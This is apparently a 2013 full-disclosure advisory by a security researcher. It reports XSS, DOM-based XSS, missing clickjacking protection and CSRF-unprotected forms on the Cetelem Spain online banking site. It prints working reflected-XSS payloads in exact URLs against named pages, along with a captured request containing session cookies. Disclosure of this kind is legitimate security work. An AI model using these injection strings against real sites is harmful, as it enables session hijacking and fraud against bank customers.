CETELEM ON LINE BANK DOM-Based XSS / Clickjacking: X-Frame-Options header missing / CSRF TIME-LINE VULNERABILITY Multiples Advisories but Vendor not response 25-31 / 08 / 2013 Not Response ( Summer Time? ) 3-09-2013 Full Disclosure I. VULNERABILITY ------------------------- #Title: CETELEM ON LINE BANK DOM Based Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection #Vendor:httpS://www.cetelem.es/ #Author:Juan Carlos García (@secnight) #Follow US @habemuscurso Twitter:@secnight II. DESCRIPTION ------------------------- Cetelem is a bank specializing in consumer lending (consumer credit, online credit and cards). Cetelem's main activity is the selling point funding, which accounts for 66.5% of its activity, which has more than 2,800 stores and more than 1,000 partners car dealers. The granting of credit cards, which represents 26% of its activity and now has about 500,000 active cards. The one major brands of BNP Paribas Personal Finance are: Cetelem (Argentina, Spain, France, Hungary, Portugal, Czech Republic, Romania, Russia, Slovakia) III. PROOF OF CONCEPT ------------------------- Cross site scripting ********************* Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Affected items /banco/creditos/unificacion-credito.jsp (2) " URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad=" The input is reflected inside a tag parameter between double quotes. GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO%22%20onmouseover%3dprompt%28999458%29%20bad%3d%22&loadParam=false Variant URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad=" LoadParam URL encoded GET input loadParam was set to false_930312():;922135 The input is reflected inside <script> tag. GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO&loadParam=false_930312%28%29%3a%3b922135 DOM-based Cross-Site Scripting ****************************** Attack details This vulnerability affects /banco/empresa/contacto.jsp. Script code from document.location path part was executed via document.write() or document.writeln() function. The code was executed in: https://www.ntrsupport.com/inquiero/web/an/ann4.asp?login=I23ECF50CC6BF1A9D700B43&lang=es&bgcolor=F5F3EE&txtcolor=009966&button=contacte_cetelem_new&ref=esta llamada viene desde el contacte de Cetelem.es&cat=SAC&cob=1 /onlineCetelem/FcControlador.srvl. Script code from document.location path part was executed via document.write() or document.writeln() function. The code was executed in: https://www.ntrsupport.com/inquiero/web/an/ann4.asp?login=I23ECF50CC6BF1A9D700B43&lang=es&bgcolor=F5F3EE&txtcolor=009966&button=ayuda_zc&cat=direct&ref=esta llamada viene desde la calculadora&cob=1 Clickjacking: X-Frame-Options header missing ********************************************* Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. This vulnerability affects Web Server. Request GET / HTTP/1.1 Cookie: JSESSIONID=NbSfSlsWg6fYKt41d6ZSRhLWMZYdfBRHq2zLyhYGn1LKV4j92JGg!1612925708; CookieCTLM=1728053888.25115.0000 Host: www.cetelem.es Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Response HTTP/1.1 200 OK Date: Tue, 03 Sep 2013 00:24:24 GMT Content-Length: 196 Content-Type: text/html; charset=ISO-8859-1 X-Powered-By: Servlet/2.5 JSP/2.1 HTML form without CSRF protection ******************************** Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Affected items /banco/bancodocs/js/camposAplicativo.js /banco/creditos/calcular-tasa-endeudamiento.jsp /banco/creditos/credito-medida.jsp /banco/creditos/unificacion-credito.jsp (650acedeac5b1b8ff8a5bcecd8fefb28) /banco/empresa/contacte-queja.jsp /banco/renting/renting-form-contacto.jsp /banco/renting/renting-formulario.jsp /onlineCetelem/FcControlador.srvl (03d0a02bcae74455d9c1db6e3e0ebc7d) /onlineCetelem/FcControlador.srvl (0701cfa9495bc159d8d7363dd3a16043) /onlineCetelem/FcControlador.srvl (0b38c4486c3a40b0acaacf30ac5b2f19) /onlineCetelem/FcControlador.srvl (9015d84e8de4ec0d46e99604a1d38094) /onlineCetelem/FcControlador.srvl (9b46e4dc609d87508e6f1a7762f99ed5) /onlineCetelem/FcControlador.srvl (a74fae0d1a6955158369d4baabefda8f) /banco/bancodocs/js/camposAplicativo.js. Form name: frm Form action: https://www.cetelem.es/banco/bancodocs/js/camposAplicativo.js Form method: POST Form inputs: hidOrigen [Hidden] hidCod_Material [Hidden] hidDestino [Hidden] hidImp_Financiar_Ent [Hidden] hidImp_Financiar_Dec [Hidden] hidDura [Hidden] hidProducto [Hidden] hidModalidad_Crto [Hidden] hidSeguro [Hidden] hidAplicativo [Hidden] hidAcuerdo [Hidden] hidCodigo [Hidden] hidDuracFija [Hidden] hidDuraMax [Hidden] hidDuraMin [Hidden] hidImpFijo [Hidden] hidImpMin [Hidden] hidImpMax [Hidden] hidSoloLectura [Hidden] One Example.. ( Too Many html form wtihout..) Request GET /banco/bancodocs/js/camposAplicativo.js HTTP/1.1 Pragma: no-cache Referer: http://www.cetelem.es/banco/bancodocs/js/camposAplicativo.js HTML Response document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); //a continuacin se van a incluir unos nuevos campos para las ofertas que tengan algun tipo de restriccion, estos // van a ser la duracion (minima,maxima, fija,),y el importe(minimo,maximo y fijo) document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); function mOvr(src) { src.style.cursor = 'hand'; } function mOut(src) { src.style.cursor = 'default'; } //FUNCION QUE OCULTA EL ESTADO function hidestatus() { window.status='' return true } if (document.layers) document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT) document.onmouseover=hidestatus document.onmouseout=hidestatus The impact of this vulnerability ________________________________ An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. How to fix this vulnerability _______________________________ Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. IV. BUSINESS IMPACT ------------------------- This type of failure Banks On line they have so many customers are extremely dangerous because they can be a serious impact on customers. No bank can have bugs in the code. Customer trust can be affected V SOLUTION ------------------------ Write Secure Code VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García (@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.